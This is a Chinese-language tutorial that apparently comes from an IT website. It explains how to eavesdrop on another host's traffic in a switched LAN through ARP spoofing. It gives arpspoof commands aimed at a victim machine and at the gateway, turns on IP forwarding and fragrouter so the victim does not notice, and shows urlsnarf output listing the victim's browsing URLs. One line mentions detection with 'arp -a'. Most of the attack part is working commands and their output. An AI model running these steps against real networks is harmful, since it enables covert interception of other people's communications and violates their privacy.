此文章主要向大家描述的是交換環(huán)境下的Sniffer，通常在局域網(wǎng)環(huán)境中，我們都是通過交換環(huán)境的網(wǎng)關(guān)上網(wǎng)的，在交換環(huán)境中使用NetXray或者NAISniffer一類的嗅探工具除了抓到自己的包以外，是不能看到其他主機(jī)的網(wǎng)絡(luò)通信的。

通常在局域網(wǎng)環(huán)境中，我們都是通過交換環(huán)境的網(wǎng)關(guān)上網(wǎng)的，在交換環(huán)境中使用NetXray或者NAISniffer一類的嗅探工具除了抓到自己的包以外，是不能看到其他主機(jī)的網(wǎng)絡(luò)通信的。

但是我們可以通過利用ARP欺騙可以實(shí)現(xiàn)Sniffer的目的。

ARP協(xié)議是將IP解析為MAC地址的協(xié)議，局域網(wǎng)中的通信都是基于MAC的。

例如下面這樣的情況：

在局域網(wǎng)中192.168.0.24和192.168.0.29都是通過網(wǎng)關(guān)192.168.0.1上網(wǎng)的，假定攻擊者的系統(tǒng)為192.168.0.24，他希望聽到192.168.0.29的通信，那么我們就可以利用ARP欺騙實(shí)現(xiàn)。

1、首先告訴192.168.0.29，網(wǎng)關(guān)192.168.0.1的MAC地址是192.168.0.24

2、告訴192.168.0.1，192.168.0.29的MAC地址是192.168.0.24。

這樣192.168.0.29和192.168.0.1之間的數(shù)據(jù)包，就會(huì)發(fā)給192.168.0.24，也就是攻擊者的機(jī)器，這樣就可以聽到會(huì)話了。但是這么做的有一個(gè)問題，192.168.0.29發(fā)現(xiàn)自己不能上網(wǎng)了，因?yàn)樵瓉戆l(fā)給192.168.0.1的數(shù)據(jù)包都被192.168.0.24接收了，而并沒有發(fā)給網(wǎng)關(guān)192.168.0.1。

這時(shí)候192.168.0.24設(shè)置一個(gè)包轉(zhuǎn)發(fā)的東西就可以解決這個(gè)問題了，也就是從192.168.0.29收到的包轉(zhuǎn)發(fā)給192.168.0.1，在把從192.168.0.1收到的包發(fā)給192.168.0.29。這樣192.168.0.29根本就不會(huì)意識(shí)到自己被監(jiān)聽了。

具體實(shí)現(xiàn)：

1、欺騙192.168.0.29，告訴這臺(tái)機(jī)器網(wǎng)關(guān)192.168.0.1的MAC地址是自己(192.168.0.24)。

[root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.29192.168.0.1

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:0:21:0:0:180:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:0:21:0:0:18

………………………………..

這時(shí)候?qū)?92.168.0.29的ARP欺騙就開始了。

2、欺騙192.168.0.1，告訴網(wǎng)關(guān)192.168.0.29的MAC地址是自己(192.168.0.24)。

[root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.1192.168.0.29

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

其實(shí)在這個(gè)時(shí)候192.168.0.29是可以發(fā)現(xiàn)的自己被欺騙了。在CMD下面使用ARP–a命令：

C:\WINNT>arp-a

Interface:192.168.0.29onInterface0x1000003

InternetAddressPhysicalAddressType

192.168.0.100-50-56-40-07-71dynamic

192.168.0.2400-50-56-40-07-71dynamic

兩個(gè)IP地址的MAC地址居然是一模一樣的!不過很少有人會(huì)這么做:-)。

3、設(shè)置一個(gè)包轉(zhuǎn)發(fā)

[root@Linuxfragrouter-1.6]#./fragrouter-B1

fragrouter:base-1:normalIPforwarding

在這之前別忘了首先需要打開包轉(zhuǎn)發(fā)的功能

[root@Linux/proc]#echo1>/proc/sys/net/ipv4/ip_forward

萬事具備，可以開始SNIFFER了。

例如想看看192.168.0.29在瀏覽什么地方：

[root@Linuxdsniff-2.3]#./urlsnarf

urlsnarf:listeningoneth0[tcpport80orport8080orport3128]

Kitty[18/May/2002:20:02:25+1100]"GEThttp://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7HTTP/1.1"--"http://www.google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&btnG=Google%E6%90%9C%E7%B4%A2&lr=""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

Kitty--[18/May/2002:20:02:28+1100]"GEThttp://www.ezboard.com/ztyles/default.cssHTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

Kitty--[18/May/2002:20:02:29+1100]"GEThttp://www1.ezboard.com/spch.js?customerid=1147458082HTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

當(dāng)然也可以知道其他………:-)

以上的相關(guān)內(nèi)容就是對(duì)交換環(huán)境下的Sniffer 的介紹，望你能有所收獲。

【編輯推薦】

1. 網(wǎng)絡(luò)嗅探教程：使用Sniffer Pro監(jiān)控ARP協(xié)議欺騙
2. 教你使用Anti ARP Sniffer查找ARP攻擊者
3. 網(wǎng)絡(luò)嗅探教程：使用Sniffer Pro監(jiān)控網(wǎng)絡(luò)流量
4. 用Sniffer和ARP分析網(wǎng)絡(luò)問題
5. 使用Sniffer截獲流經(jīng)本機(jī)網(wǎng)卡的IP數(shù)據(jù)包